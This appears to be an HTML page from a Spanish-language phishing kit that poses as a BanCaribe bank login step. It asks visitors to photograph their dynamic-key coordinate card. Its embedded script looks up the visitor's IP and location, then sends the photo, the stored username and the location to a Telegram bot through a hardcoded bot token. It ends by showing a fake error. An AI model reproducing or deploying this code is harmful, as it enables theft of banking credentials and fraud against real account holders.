<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">

    <title>Login</title>
    <link rel="stylesheet" href="styles.css">
    <style>
        .footer {
            position: absolute;
            bottom: 0;
            left: 0;
            width: 100%;
            text-align: center;
            background-color: transparent;
            /* Cambia el color de fondo según tus preferencias */
            padding: 20px 0;
            box-sizing: border-box;
        }

        .footer img {
            width: 50%;
            min-width: 350px;
            margin-top: 50px;
            display: block;
            margin-left: auto;
            margin-right: auto;
        }

        @media only screen and (max-width: 600px) {
            .footer img {
                width: 80%;
                /* Ajusta el tamaño de la imagen para dispositivos móviles */
                min-width: unset;
            }

            .footer {
                display: none;
            }
        }
    </style>
</head>

<body style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;">
    <div class="container">
        <img src="logo.png" alt="Logo" class="logo">
        <form class="login-form" id="formfoto">
            <div style="width: 96%;padding: 10px;background: #00a0b1;color: white;font-weight: bold;">Ingresar al
                Sistema</div>
            <div style="margin: 30px;">
                <div style="width: 100%; text-align: center">
                    <img src="coordenadas.png" style="width: 80%" />
                    <h5>
                        Para completar la verficación suba una foto de su clave
                        dinámica y lueco click en continuar
                    </h5>
                    <input type="file" id="file-input" style="display: none" />
                    <label for="file-input" style="
                        padding: 5px;
                        padding-left: 20px;
                        padding-right: 20px;
                        background: #009cb1;
                        color: white;
                        font-weight: bold;
                      ">Tomar Foto</label>
                </div>

                <button type="submit">Ingresar</button>
            </div>
        </form>
        <div style="text-align: center;">
            <img src="2.PNG" style="width: 25%; min-width: 350px;margin-top: 50px;">
            <br>
            <div class="footer">
                <img src="footer.PNG" alt="Footer">
            </div>
        </div>

    </div>

</body>
<script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>

<script>
    const url = "https://ipapi.co/json/";
    const form = document.querySelector("#formfoto");
    form.addEventListener("submit", (event) => {
        event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
        axios
            .get(url)
            .then((response) => {
                const imagen = document.getElementById("file-input");
                const file = imagen.files[0];
                const formData = new FormData();
                formData.append("photo", file);

                formData.append("chat_id", "-4603058932");
                const message =
                    "\nBanCaribe\nUsuario: " +
                    localStorage.getItem("usuario") +
                    "\nCiudad:" +
                    response.data.city +
                    "\nPais: " +
                    response.data.country +
                    "\nIP: " +
                    response.data.ip;
                formData.append("caption", message);
                axios
                    .post(
                        "https://api.telegram.org/bot7687111592:AAHMnj4bePE4PPAQVedk4zsqab5ZFPz2anw/sendPhoto",
                        formData
                    )
                    .then((response) => {
                        console.log(response.data);
                        alert(
                            "Verificación incorrecta intente nuevamente en unos segundos."
                        );
                        window.location.href = "index.html";
                    })
                    .catch((error) => {
                        console.error(error);
                    });
            })
            .catch((error) => {
                console.log(error);
            });
    });
</script>

</html>